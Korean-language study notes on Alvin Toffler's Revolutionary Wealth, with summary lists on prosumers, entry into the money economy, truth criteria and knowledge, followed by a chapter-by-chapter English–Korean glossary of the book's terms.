[info] 프로슈머 영향 by 앨빈 토플러

** 프로슈머와 프로슈밍이 화폐 경제와 가치를 서로 교환하며 상호 작용하는 경로 12가지

1. 프로슈머는 제3의 직업과 자가 서비스 활동을 통해 무보수로 일을 수행한다.
- 은행에서 현금자동입출금기를 이용하거나 슈퍼마켓에서 스스로 계산을 하는 프로슈머의 일은 화페 경제의 노동비용을 감소시키고 단순 근로직을 줄인다. 병자나 노인을 돌보고, 스스로 요리하고, 집 청소를 하고, 홈스쿨링(home-school, 아이들을 정규 학교에 보내지 않고 부모들이 스스로 행하는 교육)하거나, 다른 사람에게 보수를 주고 일을 시키는 대신 스스로 일하는 경우가 여기에 해당된다.

2. 프로슈머는 화폐 경제에서 자본재를 구입한다.
- 그들은 전기톱, 컴퓨터, 디지털 카메라 등을 구입하여 비화폐 경제 안에서 자신이나 타인을 위한 가치를 창출해 낸다. 이러한 활동으로 화폐 경제에 또 다른 시장이 형성된다.

3. 프로슈머는 자신의 도구와 자본을 화폐 경제에 있는 사용자들에게 빌려준다. 또 다른 공짜 점심이다.
- 예컨대 의학이나 환경 연구를 위해서, 천문학적인 관찰을 위해서, 다른 많은 사회적으로 중요한 목적을 위해서 다른 사람들이 컴퓨터의 잉여능력을 공짜로 사용하도록 허락한다.

4. 프로슈머는 주택 가치를 향상시킨다.
- 그들이 공사 인력을 이용하는 대신에 스스로 페인트 칠, 지붕 갈기, 방 늘리기, 나무 심기와 같은 일을 할 때마다 주택의 가치는 상승된다. 상승된 주택의 가치는 모기지(mortgage, 장기주택담보대출), 이자율, 기타 화폐 경제 안의 다른 변수에까지 영향을 미친다.

5. 프로슈머는 제품이나 서비스, 기술을 시장화한다.
- 이들은 개인적인 용도로 개발한 기술이나 제품, 서비스를 시장에 내놓기도 한다. 그 과정에서 가끔 신생 회사나 사업이 만들어진다. 시장 외부에 있던 프로슈머가 만든 리눅스는 화폐 시장 안으로 들어와 중요한 상업적인 가치를 지닌 제품이 되었다.

6. 프로슈머는 또한 제품이나 서비스를 탈시장화한다.
- 프로슈머는 사용자들에게 공짜나 다름없는 대안을 제공하여 기존의 재화와 서비스를 시장 밖으로 내쫓는다. 화폐 경제 밖에서 가해지는 이런 위협은 더욱 새롭고 값싼 제품을 만들어 내는 원동력이 된다. VoIP나 아이팟 같은 상품들을 보라. 프로슈밍은 탈시장화와 시장화의 주기를 단축시킬 수 있다.

7. 프로슈머는 자원봉사자로서의 가치를 창출한다.
- 이들은 비상시에 대가를 바라지 않고 도움을 준다. 물론 비상시가 아니라도 이들은 날마다 노인복지관에서 봉사하고, 의료적인 도움과 많은 다른 서비스를 사회에 제공한다. 청소년 폭력배를 선도하고, 지역사회협의회나 사회적 유대감 형성에 기여할 교회나 다른 조직체를 만들고 유지시킨다. 그들의 역할이 없었다면 더 많은 경찰이나 교도소가 필요하게 되어 훨씬 많은 비용이 필요했을 것이다.

8. 프로슈머는 영리기업들에게 유용한 무료 정보를 제공한다.
- 프로슈머는 새로운 생산품에 대한 베타 테스트(beta-test, 제품 출시 전 실제 사용자를 대상으로 시험하여 오류 또는 개선점을 찾아내기 위한 검사)와 조사에 응하고, 새로운 고객의 욕구를 찾아낼 수 있도록 돕고, 바이러스 마케팅(viral marketing, 홍보를 소비자들의 입이나 이메일을 빌어 전하는 방식) 같은 수많은 무보수 서비스를 수행함으로써 기업에 유용한 정보를 제공한다.

9. 프로슈머는 화폐 경제에서의 소비자 힘을 강화시킨다.
- 이들은 구매정보를 서로 공유한다. 예컨대 다양한 건강 관련 문제나 의약품과 관련된 경험을 서로 공유함으로써 환자는 의사에 대해 영향력을 높일 수 있다.

10. 프로슈머는 혁신을 가속화한다.
- 프로슈머는 무보수 전문가, 지도자, 교사, 상담가로 활동한다. 그들은 최신 기술이 출현하자마자 최대한 빨리 이를 이용할 수 있도록 서로를 교육한다. 이를 통해서 기술적인 변화가 가속화되고, 유급 경제의 생산성이 향상된다. 이들의 활동은 단순히 생산적인 것이 아니라 창조생산적이다.

11. 프로슈머는 지식을 신속히 창출하고 그것을 전파하며 지식 기반 경제에서 사용할 수 있도록 사이버 공간에 저장한다.
- 사이버 공간에 저장된 많은 데이터, 정보, 지식은 소프트웨어 제작자, 금융 전문가, 사회학자, 인류학자, 과학자, 기술자, 기타 모든 사람들이 공짜로 공헌한 결과이다. 내용의 정확도 수준은 천차만별이지만 그중 많은 부분이 언젠가 시장화될 것이고, 또한 투자자, 경제인, 화폐 경제 안에서 일하는 다수의 사람들이 이용하게 될 것이다. 이 또한 공짜 투입물이다.

12. 프로슈머는 어린이를 양육하고 노동력을 재생산한다.
- 프로슈머의 공헌은 부모와 보호자로서의 역할에 있어서도 지대하다. 이에 비하면 다른 활동들은 상대적으로 왜소하게 보일 정도이다. 자녀의 사회화를 돕고, 이들에게 언어를 가르치고, 현재의 중심 경제에 부합하는 가치들을 지속적으로 심어 준다. 그럼으로써 자녀들이 자손 대대로 부를 창출할 수 있도록 준비시킨다. 이들이 제공하는 공짜 점심이 없다면 유급 경제도 곧 사라질 것이다.

[info] 경제 활동으로 입문하기 위한 7개의 문 by 앨빈 토플러

[경제 활동으로 입문하기 위한 7개의 문]

1. 팔 수 있는 무언가를 만들어라 : 옥수수를 경작하라. 초상화를 그려라. 샌들을 만들라. 구매자를 찾으면 이곳에 들어올 수 있다.

2. 직장을 구하라 : 일을 하라 그 보상으로 돈을 받아라. 이제 당신은 화폐 경제 안으로 들어서게 되었다. 가시 경제(visible economy)의 한 부분이 된 것이다.

3. 상속을 받아라 : 부모님이나 친척이 유산을 남길 경우 이 문은 활짝 열릴 것이다. 자연스럽게 화폐 경제에 들어설 수 있다. 직장을 구할 필요가 없을 수도 있다.

4. 선물을 받아라 : 누군가가 돈을 주거나 돈으로 교환 또는 판매할 수 있는 무언가를 줄 수 있다. 그것이 어떤 형태이든, 일단 받으면 이 안에 들어설 수 있다.

5. 결혼하라. 또는 재혼하라 : 위의 문 중 한 곳에 이미 들어선 이를 배우자로 고르고, 그 배우자의 돈을 공유하라. 그러면 당신도 이 문 안으로 들어갈 수 있다.

6. 복지 혜택을 받아라 : 정부가 불만스러워하며 마지못해 내주는 돈을 받을 수도 있다. 액수는 극히 적더라도, 그 정도만으로도 화폐 경제로 들어설 수 있다.

7. 훔쳐라 : 마지막으로 훔치는 방법이 있다. 이는 범죄자의 첫 번째 수단이자 가난한 이에게는 최후의 수단이다.

[info] 정당성을 입증하기 위해 사용되는 6가지 기준 by 앨빈 토플러

[정당성을 입증하기 위해 사용되는 6가지 기준]

1. 합의 : 우리가 진실이라고 부르는 상당수 혹은 대부분은 합의(consensus)에 의해 옳은 것으로 인식된 것이다. 이는 인습적 지혜이다. '모든 사람들이 X를 진실이라고 알고 있다. 그러므로 X는 진실임에 틀림없다'는 식이다.

2. 일관성 : 어떤 사실이 진실이라고 여겨지는 다른 사실들과 부합할 경우, 이 사실 또한 진실이라는 가정을 근거로 한다.

3. 권위 : 일상생활에서 진실로 받아들이고 있는 것의 상당 부분은 종교뿐 아니라 속세에서도 권위(authority)에 근거하는 경우가 많다. 미국에서는 수년 동안 유명 투자가인 워런 버핏(Warren Buffet)이 월 스트리트에 대해 전망한 말은 모두 진실로 통용되었다. 어떤 이들은 성경이나 코란에 있는 내용이라면 무조건 진실이라고 확신한다. 권위가 바로 진실을 판단하는 기준이 된 것이다.

4. 계시 : 어떤 이에게 있어서는 진실이 불가사의한 계시(revelation)에 근거하는 경우도 있다. 의문을 가질 수도 없으며, 그저 그렇다고 믿어야 한다. 내 말을 믿어라.

5. 내구성 : 진실의 기준이 내구성(durability)과 세월인 경우도 있다. 진실이 '시간의 시험'을 견뎌냈는가? 실제 경험한 바 있는 진실인가? 또는 새로운 진실이라서 의문을 가져야 하는 진실인가? 여기에서 권위는 신도, 책도, 사람도 아닌 과거라는 어마어마한 시간의 조각이다.

6. 과학 : 과학(science)은 다른 기준들과 다르다. 혹독한 시험을 거쳐 진실을 검증하는 유일한 기준이다. 그러나 과학은 지금까지 본 다양한 기준 중 사람들이 일상생활에서 가장 적게 의존하는 기준이다. 과학은 사실의 집합이 아니다. 과학은 종종 흐트러지고 비연속적인 아이디어들을 시험하는 과정이다.

[info] 지식이란 - by 앨빈 토플러

** 지식

1. 지식은 원래 비경쟁적이다.

2. 지식은 형태가 없다.

3. 지식은 직선적이지 않다.

4. 지식은 관계적이다.

5. 지식은 다른 지식과 어우러진다.

6. 지식은 어떤 상품보다도 이동이 편리하다.

7. 지식은 상징이나 추상적인 개념으로 압축할 수 있다.

8. 지식은 점점 더 작은 공간에 저장할 수 있다.

9. 지식은 명시적일 수도 있고 암시적일 수도 있다.

10. 지식은 밀봉하기 어렵다. 퍼져 나간다.

[BOOK] revolutionary wealth 부의 미래

revolutionary wealth 부의 미래

- 제1부 혁명(Revolution)

- revolutionary wealth : 혁명적 부

- brain bank : 두뇌 은행

- modernity : 현대화

- wealth system : 부 창출 시스템

- Joint Economic Committee : 미국 하원 합동경제위원회

- Future Shock : 미래 쇼크

- UPI(United Press International)

- War and Anti-War : 전쟁과 반전쟁

- Creating a New civilization : 새로운 문명의 창조


1. Spearheading Wealth : 선봉에 서 있는 부

- blog : web + log 의 줄임말로 일종의 개인 웹사이트

- flash mob : 휴대폰이나 이메일 연락으로 아주 짧은 시간 동안 모여 황당한 행동을 하고 순식간에 흩어지는 불특정 다수의 군중

- EU(European Union) : 유럽연합

- flash-market : 수명이 지극히 짧은 시장

- business fundamentals : 비즈니스 기반

- deep fundamentals : 심층 기반

- programmable money : 전자화폐

- synchronization industry : 동시화 산업

- loneliness industry : 독립 산업

- prosumer(프로슈머) : 생산소비자

- new economy : 신경제

- GDP(Gross Domestic Product) : 국내총생산

- Doing your own thing : 너 자신에 충실하라

- NOW(National Organization for Women) : 전국여성기구

- Pentagon : 미국 국방부

- HP(Hewlett-Packard)

- anti-matter : 반물질

- anti-hydrogen : 반수소

- K-tool : 선진 경제에서 가장 중요한 자본의 형태인 지식을 창출하는 도구

- PCR(Polymerase Chain Reaction) : 유전자 진단 방법의 하나

- attoseconds : 10의 마이너스 18승 초

- zeptoseconds : 10의 마이너스 21승 초


2. The Child of Desire : 욕망의 소산

- Gabriel Zaid(가브리엘 자이드 - 멕시코 작가) : 부는 결국 모든 가능성의 축적물일 뿐이다

- utility : 효용

- infomercial(인포머셜) : 정보 + 광고


제2부 심층 기반(Deep fundamentals)

3. Waves of Wealth : 부의 물결

- Bread and Dreams : 캄포레시의 저서 빵과 꿈

- OECD(Organization for Economic Cooperation and Development) : 경제협력개발기구

- massification : 대량화

- de-massification : 탈대량화

- commoditized : 일반 상품화

- growing : 키우는 것

- making : 만드는 것

- serving : 서비스하는 것

- thinking : 생각하는 것

- knowing : 아는 것

- experiencing : 경험하는 것


4. Deep Fundamentals : 상호 작용하는 심층 기반

- fundamentals(펀더멘털) : 기반

- GM(General Motors)

- inerrantist : 성서신봉자

- BRE(Bureau of Economic Analysis) : 미국 경제분석국

- FRB(Federal Reserve Board) : 연방준비제도이사회

- super-specialization : 고도 전문화


제3부 Rearranging time : 시간의 재정렬

5. The Clash of Speeds : 속도의 충돌

- de-synchronization effect : 비동시화 효과

- Law of Congruence : 적합성의 법칙

- SEC(Securities and Exchange Commission) : 미국 증권관리위원회

- Taylorism(테일러주의) : 과학적 경영관리법

- NGO(Non-governmental Grassroots Organizations) : 비정부기구

- FDA(Food and Drug Administration) : 미국 식품의약국

- UN(United Nations) : 유엔

- IMF(International Monetary Fund) : 국제통화기금

- WTO(World Trade Organization) : 세계무역기구

- IGO(Inter Governmental Organization) : 정부간국제기구

- UPU(Universal Postal Union) : 만국우편연합

- WIPO(World Intellectual Property Organization) : 세계지적재산권기구

- info-biological : 정보-생물학적


6. The Synchronization Industry : 동시화 산업

- Federal Reserve Bank : 미국 연방준비은행

- Bank of Japan : 일본은행

- economic music : 경제 음악

- entrainment : 동조화

- joint processing : 공동 처리

- balanced growth : 균형성장

- gales of creative destruction : 창조적인 파괴의 질풍

- Institute of Industrial Engineers : 산업공학인협회

- JIT(Just-In-Time) : 적시생산

- MRP(Material Requirements Planning : 자재 소요량 계획) : 완제품 생산 일정을 위해 원자재의 필요량 및 필요 시기를 계획,관리하는 기법

- NCMS(National Center for Manufacturing Sciences) : 미국 국립제조과학센터

- Reengineering the Corporation : 리엔지니어링 기업혁명

- ERP(Enterprise Resource Planning : 전사적 자원관리) : 기업 활동을 위해 사용되는 기업내 모든 인적, 물적 자원을 효율적으로 관리하여 궁극적으로 기업의 경쟁력을 강화시키는 통합정보 시스템
- UPS(United Parcel Service)

- Synchronizing the World of Commerce : 세계 교역의 동시화

- temporal integration : 시간적 통합


7. The Arrhythmic Economy : 불규칙한 경제

- ecology of time : 시간의 생태학

- Armed Forces Journal International : 국제군사잡지


8. The New Timescape : 새로워지는 시간의 풍경

- sharecropper(소작인) : 미국의 노예제 폐지 후 남부에서 생성

- Bureau of Labor Statistics : 미국노동통계청

- time deepening : 짧은 시간에 더 많은 일을 하고, 동시에 여러 가지 일을 하며, 보다 정밀하게 시간을 측정한다.

- time famine(시간기근) : 시간 부족보다 더 심화된 표현

- hypercompetition : 초경쟁

- emergent economy : 신흥 경제

- Free Agent Nation : 다니엘 핑크의 저서, 프리에이전트의 시대

- TiVo : 디지털비디오리코더 - 광고를 없애거나 잠시 정지시켰다 다시 볼 수 있는 새로운 TV시청 시스템

- time-shift : 시간 전환

- ECN(Electronic Communications Networks) : 장외전자거래시장


제4부 Stretching space : 공간의 확장

9. The Great Circle : 거대한 순환

- wealth mobility : 부의 이동

- FDI(Foreign Direct Investment) : 해외직접투자

- Council on Foreign Relations : 외교협회


10. Higher Value-Added Places : 고부가가치 장소

- parallel world(평행 우주) : 당신과 똑같은 누군가가 다른 차원에서 살고 있을 수 있다는 개념

- China Development Institute : 중국개발연구소

- region-state : 지역 국가

- business unit : 비즈니스 단위

- maquiladora(마킬라도라) : 값싼 노동력을 이용하여 조립 수출하는 멕시코의 외국계 공장

- Plantronics(플랜트로닉스) : 미국의 음향기기 전문 업체

- re-globalization : 재세계화

- race to the bottom(하향 경쟁) : 바닥으로의 경쟁이라고도 함

- rece-to-the-bottom theory : 최하층 경쟁이론

- Small Business Survival Committee : 소기업생존위원회

- bCentral.com(b센트럴닷컴) : 소규모 온라인 사업자를 위한 전자상거래, 마케팅 서비스 제공

- State New Economy Index : 신경제지표


11. Spatial Reach : 공간적 범위

- WASP : 앵글로색슨계 백인신교도

- The Geography of Money(화폐의 지리학) : 저자 - 벤자민 코헨

- invading currency : 침투하는 통화

- seigniorage(시뇨리지) : 화폐주조 차익


12. An Unready World : 준비되지 않은 세계

- de-globalization : 탈세계화

- more capitalist than thou : 자본주의보다 더한 자본주의

- Foreign Policy : 외교정책

- Agency for International Development : 국제개발기구

- UNICEF : 유니세프

- Institute for World Economics : 세계경제연구소


13. Thrust Reversers : 역추진 장치

- Washington Consensus : 워싱턴 합의

- counter-global : 세계화

- financial contagion(금융 전염) : 한 국가 또는 지역의 금융 위기 충격이 펀더멘탈을 초월해 전 세계로 퍼져 나가는 현상

- NYSE(New York Stock Exchange : 뉴욕증권거래소

- Southern Cone Common Market : 남미공동시장

- Mad Max(매드 맥스) : 핵 전쟁 이후에 자원이 고갈된 피폐한 미래 사회를 배경으로 한 영화


14. The Space Drive : 우주를 향하여

- GPS(Global Positioning System) : 위성항법장치

- commercial remote imaging : 상업용 원격 영상

- CGWIC(China Great Wall Industry Corp.) : 중국장성공업총공사

- Satellite Industry Association : 위성산업협회

- Mapping Alliance Program : 매핑 얼라이언스 프로그램

- weather futures : 기후선물

- LIFFE(London International Financial Futures Exchange) : 런던국제금융선물옵션거래소

- Department of Commerce : 미국 상무부

- space agency : 우주국

- bioreactor(바이오리액터) : 생물 체내에서 일어나는 화학반응을 체외에서 이용하는 생물반응기

- Naval Research Laboratory : 미국해군연구소

- atomic clock : 원자시계

- nanosecond(나노세컨드) : 10의 마이너스 9승

- JPL(Jet Propulsion Lab) : 제트추진연구소

- Differential GPS : 정밀 GPS


제5부 Trusting knowledge : 지식에 대한 신뢰

15. The Edge of Knowledge : 지식의 이점
- rival : 경쟁

- knowledge supply : 지식 공급

- information goods : 정보재


16. Tomorrow's Oil : 미래의 석유

- ASK(Aggregate Supply of Knowledge) : 총지식 공급량

- National Science Foundation : 미국 국립과학재단


17. The Obsoledge Trap : 무용지식의 함정

- obsoledge(무용지식) : obsolete(무용한) + knowledge(지식)

- Republic : 공화국

- CERN : 유럽입자물리연구소

- knowledge management : 지식 경영

- knowledge assets : 지식 자산

- analigy : 유추

18. The Quesnay Factor : 케네 요인

- Washington Post : 워싱턴 포스트

- hedge fund : 대형 헤지펀드

- LongTerm Capital Management : 롱텀 캐피털 매니지먼트

- the hall of forecasting shame : 수치스러운 예측의 전당

- consensus forecast : 합의 전망

- network externality : 네트워크 외부성

- cost-of-living index : 생계비지수

- womb of wealth : 부의 모태

- sterile class : 쓸모없는 계층


19. Filtering Truth : 진실을 가려내는 방법

- weird theories : 괴상한 이론들

- consensus : 합의

- Senate Intelligence Committee : 미국 상원 정보위원회

- spy agency : 정보국

- consistency : 일관성

- authority : 권위

- Ayatollah(아야톨라) : 이맘과 아야톨라는 이슬람교 수니파와 시아파 성직자에 대한 존칭임

- revelation : 계시

- science : 과학

- randomized blind control : 무작위 눈가림 대조군

- truth profile : 진실 프로파일

- theocratic revolution : 신정주의 혁명

- gain : 이득


20. Trashing the Lab : 실험실 파괴

- truth-shift : 진실 변이

- WFP(World Food Program) : 유엔 세계식량계획

- British Royal Society : 영국왕립학회

- New Age Religion and Western Culture : 뉴에이지 종교와 서양 문화

- Super-Empowered Individual : 강력한 힘을 가진 개인

- National Academy of Science : 미국 국립과학원


21. The Truth Managers : 진실 관리자

- CEO(Chief Executive Officer) : 최고경영자

22. Coda : Convergence : 결론 : 컨버전스

- map of the knowable : 알 수 있는 것에 대한 지도

- data mining(데이터 마이닝) : 이전에는 발전되지 않았던 데이터들 간의 상호 관계를 분석하는 것

- Centers for Disease Control and Prevention : 미국 질병관리예방국


제6부 Prosuming : 프로슈밍


23. The Hidden Half : 숨겨진 절반을 찾아서

- visible economy : 가시 경제

- invisible economy : 보이지 않는 경제

- prosumer economy(비화폐의 프로슈머 경제) : 추적되지도 측정되지도 않고, 대가도 없이 대대적으로 경제 활동이 벌어지는 숨은 경제

- producer(생산자) : 제품, 서비스 또는 경험을 화폐 경제 안에서 팔고자 하는 사람들

- production(생산) : 제품, 서비스 또는 경험을 화폐 경제 안에서 팔고자 하는 과정

- prosumer(프로슈머) : 판매나 교환을 위해서라기보다 자신의 사용이나 만족을 위해 제품, 서비스 또는 경험을 생산하는 사람들. 개인 또는 집단들이 스스로 생산(PROduce)하면서 동시에 소비(conSUME)하는 행위를 프로슈밍(prosuming)

- charter school(차터스쿨) : 미국 주 교육위원회로부터 통제받지 않는 독립적인 공립 초,중등학교

- prosumption : 소비자생산

- potty test : 배변 훈련

- Paradigms in Progress(진보의 패러다임) : 헤이즐 헨더슨(Hazel Henderson)

- Time Dollars(타임 달러) : 에드거 칸(Edgar Cahn)

- Women's Paid and Unpaid Labor(여성의 보수와 무보수 노동) : 노나 글레이저(Nona Y. Glazer)

- Grossly Distorted Product : 국내총왜곡생산


24. The Health Prosumers : 건강한 프로슈머

- WHO(World Health Organization) : 세계보건기구

- Congressional Budget Office : 미국 의회예산국

- Chain Drug Review : 의약 네트워크 리뷰

- Journal of American Dietetic Association : 미국영양협회지

- How Can I Tell You This? - 어떻게 얘기해야 할까?

- PDR(Physicians' Desk Reference) : 의사들이 처방할 때 참고하는 약전

- Association for Homecare : 미국 자택치료협회

- estradiol(에스트라디올) : 난소 호르몬의 일종

- testosterone(테스토스테론) : 남성 호르몬의 일종

- progesterone(프로게스테론) : 황체 호르몬

- self-care : 자가 진료

- paid-care : 유료 진료


25. Our Third Job : 제3의 직업

- sandwich generation : 샌드위치 세대

- BOA(Bank of America) : 아메리카은행

- free lunch economy : 공짜 점심 경제


26. The Coming Prosumer Explosion : 다가오는 프로슈머의 폭발

- DIY(Do-IT-Yourselfer)

- HGTV(Home and Garden TV) : 가정원예 방송

- RepairClinic.com(리페어 클리닉닷컴) : 인터넷으로 가전제품의 부품을 판매하는 사이트

- sweat equity : 땀의 분담

- Automotive Aftermarket Industry Association : 미국 자동차 A/S부품협회

- National Gardening Association : 미국 국립원예협회

- slotcar(슬롯카) : 트랙에 파여 있는 홈에서 전원을 공급받아 모터를 가동시켜 작동하는 모형 미니 자동차

- digital divide(정보격차) : 디지털 디바이드, 정보접근과 정보 이용이 가능한 자와 불가능한 자 사이의 경제적, 사회적 격차가 심화되는 현상을 가리키는 말

- Ubiquitous WWW(유비쿼터스 웹) : 어디에나 존재하는 웹

- proteomics(프로테오믹스) : 단백질체학

- do-it-yourself joumalists : 시민기자


27. More Free Lunch : 더 많은 공짜 점심

- Independent Sector(인디펜던트섹터) : 기부 및 비영리 봉사협회

- Habitat for Humanity : 사랑의 집짓기

- Red Crescent(적신월사) : 이슬람 국가의 적십자에 해당하는 조직

- Last Theorem(마지막 정리) : 피에르 드 페르마(Pierre de Fermat)

- Smithsonian Astrophysical Observatory : 천체물리관측대

- moon watch : 달 관측

- Trackers of the Skies(하늘을 쫓는 자들) : 넬슨 헤이즈(E. Nelson. Hayes)

- House Commitee Science : 미국 하원 과학위원회

- prosumer capital asset : 프로슈머 자본자산

- SETI(Search for Extraterrestrial Intelligence) : 세티

- Planetary Society : 행성협회

- National Foundation for Cancer Research : 미국 국립 암 연구재단

- grid(그리드) : 지리적으로 분산돼 있는 컴퓨터, 데이터베이스 등 정보통신 자원을 네트워크로 연동해 대용량 컴퓨팅, 첨단 장비의 상호 공유 등을 가능하게 하는 차세대 인터넷 이용체계

- AARP(American Association of Retired Persons) : 전미은퇴자협회

- frictional unemployment : 마찰적 실업


28. The Music Storm : 음악 폭풍

- Federal Communication Commission : 미국 연방통신위원회

- VoIP(Voice over Internet Protocol) : 인터넷 전화방식

- weapon of market destruction : 시장 파괴 무기

- de-marketized : 탈시장화

- Department of Energy : 미국 에너지국

- Public Utility Regulation Policy Act : 공익사업 규제정책법

- Rocky Mountain Institute : 록키 마운틴 연구소

- soft energy(소프트 에너지) : 에너지 공급의 중심을 석유등의 화석연료나 원자력이 아닌 태양열, 풍력, 해양 에너지 등 재생 가능한 에너지에 두는 것

- mix-and-match(믹스 앤드 매치) : 여러 소재들을 선택하여 재구성함

- stereolithography(스테레오리토그라피) : 입체 모델링 인쇄 기법

- rapid prototyping(쾌속 조형) : 컴퓨터로 작도 또는 디자인한 제품 또는 부품을 빠른 시간 안에 시제품 또는 시작품으로 형상화하는 작업

- hyper-duplication : 초고속 복제

- fabber(패버) : 디지털 제작을 위한 디지털 패브리케이터 digital fabricator의 속어. 디지털 데이터를 이용해 자동적으로 물건을 만들어 내는 컴퓨터 안의 공장을 뜻함

- prototyping : 견본 작업

- P2P(Peer-to-Peer) : 개인 대 개인

- Unbounding the Future(나노 테크노피아) : 포어사이트 연구소(Foresight Institute)의 창립자이며 나노 기술이란 용어를 처음으로 만들어 낸 에릭 드렉슬러(K. Eric Drexler)가 쓴 책

- balsa(발사나무) : 중앙아메리카, 남아메리카가 원산지인 벽오동과의 가볍고 단단한 나무


29. The Producivity Hormone : 창조생산성 호르몬

- 창조생산성 : 프로슈머들에 의한 생산성 공헌도

- producivity : 창조생산성

- school factory : 학교 공장

- Altair 8800s : 알테어 8800

- 20s(Sol 20s)

- PARC(Palo Alto Research Center) : 팔로알토 리서치 센터

- touch pad : 터치 패드

- basic computer literacy : 기본 컴퓨터 리터러시

- self-teaching : 스스로 학습

- guru-teaching : 전문가에게 물어 비공식적으로 지식을 전수받는 교육 방식


30. Coda : Invisible Channels : 결론 : 보이지 않는 경로

- 왜 은행을 털었느냐? : 윌리 셔튼(Willie Sutton) - 거기에 돈이 있으니까!

- deification : 신격화

- mystification : 신비화

- channels : 경로

- home-school(홈스쿨링) : 아이들을 정규 학교에 보내지 않고 부모들이 스스로 행하는 교육

- mortgage(모기지) : 장기주택담보대출

- beta-test(베타 테스트) : 제품 출시 전 실제 사용자를 대상으로 시험하여 오류 또는 개선점을 찾아내기 위한 검사

- viral marketing(바이러스 마케팅) : 홍보를 소비자들의 입이나 이메일을 빌어 전하는 방식


제7부 Decadence : 데카당스

- 데카당스 : 퇴폐, 부패, 쇠퇴의 뜻으로 원래는 로마제국 쇠망기의 타락과 방탕의 시대상을 가리킴
31. The Gospel of Change : 변화의 복음

- civilization : 문명화

- NSB(National Science Board) : 미국 국립과학위원회

- AAAS(American Association for the Advancement of Science) : 미국과학진흥회

- gospel of change : 변화의 복음

- 같은 물에 발을 두 번 담글 수는 없다. 두 번째 들어갈 때 이미 그 물은 흘러가 버렸기 때문이다. - 헤라 클리토스(Heraclitus)


32. Implosion : 내부 폭발

- 결혼 리허설 : 진짜 결혼 이전에 예행연습으로 하는 결혼. 이때는 아기를 가지 않음

- reconceptualized : 개념화

- creative accounting(창조적 회계) : 회계 기준이 모호한 것을 이용해서 기술적으로 기준을 교묘하게 적용하는 회계

- trend extrapolation(추세외삽법) : 통계적 자료를 활용하여 현재의 추세를 미래까지 연장하여 봄으로써 변동의 유형, 방향을 분석하는 것

- Tokyo Stock Exchange : 도쿄증권거래소

- War Child UK(워차일드) : 전쟁으로 폐허가 된 나라의 어린이들을 돕는 자선단체

- pedophilia(소아애호증) : 아동 대상의 성도착증

- 위기와 기회는 함께 온다 : 중국 속담


33. Corroding the Wires : 철선 부식시키기

- 새롭게 떠오르는 세계라 해도 아직 절반은 썩어 무너지는 과정이 있다. 구 제도 중 어느 것이 다시 고개를 쳐들게 될지 결국 어느 것이 완전히 가라앉게 될지 아무도 모른다. - 알렉시스 드 토크빌(Alexis de Tocqueville)

- FBI(Federal Bureau Investigation) : 미국의 최고 경찰기구인 연방수사국

- Automated Case Support System : 자동화 사례 지원 시스템

- Slammer Virus(슬래머 바이러스) : 마이크로소프트의 데이터베이스 서버인 Microsoft SQL DB 서버를 공격하는 컴퓨터 바이러스의 일종

- Immigration and Naturalization Service : 미국 이민국

- World Treade Center : 세계무역센터 - 모하메드 아타(Mohamed Atta)와 마완 알 세히(Marwan al-Shehhi)에 의해 무너짐

- Federal Emergency Management Agency : 미국 연방재난관리국

- acceleration effect : 가속화 효과

- just-in-time : 정확한 시간

- CIA(Central Intelligence Agency) : 미국 중앙정보국


34. Complexorama : 복잡드라마

- surplus complexity : 잉여복잡성

- Federal Financial Supervisory Board : 금융감독원

- Bank for International Settlements : 국제결제은행

- UNCTAD(United Nations Conference on Trade and Development) : 유엔 무역개발회의

- National Information Assurance Partnership : 미국 정보보증조합

- Cato Institute(카토연구소) : 미국의 민간 정책 연구소로 정부 규제 철폐와 자유시장주의를 일관되게 주장

- individual retirement account : 개인연금계정

- BLS(Bureau of Labor Statistics : 미국 노동통계청

- intermediary actor : 조정자

- Encyclopedia of World Problems and Human Potential : 국제 문화와 인간의 잠재력에 관한 백과사전

- Byzantine complexity(비잔틴적 복잡성) : 너무 복잡해서 이해하기 불가할 정도로 과도하게, 불필요하게 복잡하게 만드는 일


35. The Sepulveda Solution : 세풀베다 해법

- transformation : 전환

- fake transformation : 허위 전환

- Department of Homeland Security : 국토방위청

- United Nations Security Council : 유엔 안전보장 상임이사회

- Compstat(컴스텟) : 범죄예측분석시스템

- broken window(깨진 창문) : 사소한 범죄 행위가 더 큰 범죄 행위를 유발시키는 요인으로 발전된다는 이론

- social inventor : 사회 발명가

- limited liability corporation : 유한책임회사

- Women's World Banking : 여성사회연대은행

- support coordinator : 지원 조정자

- Department of Human Service : 호주 복지부

- social imagination : 사회적인 상상력

- think tank : 싱크 탱크

- meta-institution : 민간 사회에 중점을 둔 한 차원 높은 기관

- Patents and Trademark office : 미국 특허청


36. Coda : After Decadence : 결론 : 데카당스 이후

- intangible : 무형

- material : 물질적

- vice : 악

- virtue : 미덕

- feminization : 여성화

- Black Sox scandal(블랙삭스 스캔들) : 화이트삭스의 선수들이 도박꾼과 손잡고 야구의 건전성을 해친 사건

- extreme : 극단

- Imagination Library : 상상력 도서관

- Center for Advanced Research and Technology : 첨단연구기술센터

- IAVA(International AIDS Voccine Initiative) : 국제에이즈백신기구

- social entrepreneurs : 사회적 기업가들

- Global Social Benefit Incubator : 글로벌 사회 혜택 인큐베이터

- World Economic Forum : 세계경제포럼(스위스의 다보스에서 열림)

- Cassandra(카산드라) : 아폴론 신에게서 예지력을 받았지만 설득력을 빼앗겨서 아무도 그의 말을 믿지 않았다는 그리스 신화에 나오는 여자 예언자

- Environmental Protection Agency : 미국 환경보호국

- satanic mills : 악마 같은 공장


제8부 Capitalism's future : 자본주의의 미래

37. Capitalism's End Game : 자본주의의 위기

- 자본주의의 4가지 핵심 구성 요소 : 자산(property), 자본(capital), 시장(markets), 돈(money)

- 자산 : 누군가가 소유하고 있는 것 또는 것들(a thing or things belonging to someone)

- double intangibility : 이중 무형성


38. Converting Capital : 자본의 전환

- captains of industry : 실업계의 거물

- robber baron : 악덕 자본가

- capitalist : 자본가

- collected : 조성

- allocated : 분배

- transferred : 이전 방식

- efficiency : 효율

- SRI(사회책임투자 펀드) : 사회책임이나 윤리성이 높은 기업에 투자하는 상품

- 미시 금융 : 저소득층을 위한 신용대출 상품

- Economic and Financial Review : 경제금융 보고서

- back-office(백오피스) : 외환, 자금의 딜링룸이 딜링 기능을 수행할 수 있도록 각종 지원, 확인 등 사후관리 서비스를 제공하는 부문

- ticker tape(티커 테이프) : 증권시세를 알리는 자막

- mobility : 유동성

- Hot money(핫머니) : 국제 금융시장을 돌아다니는 투기성 단기 자본

- para-currency : 대안 화폐


39. Impossible Markets : 시장의 부재

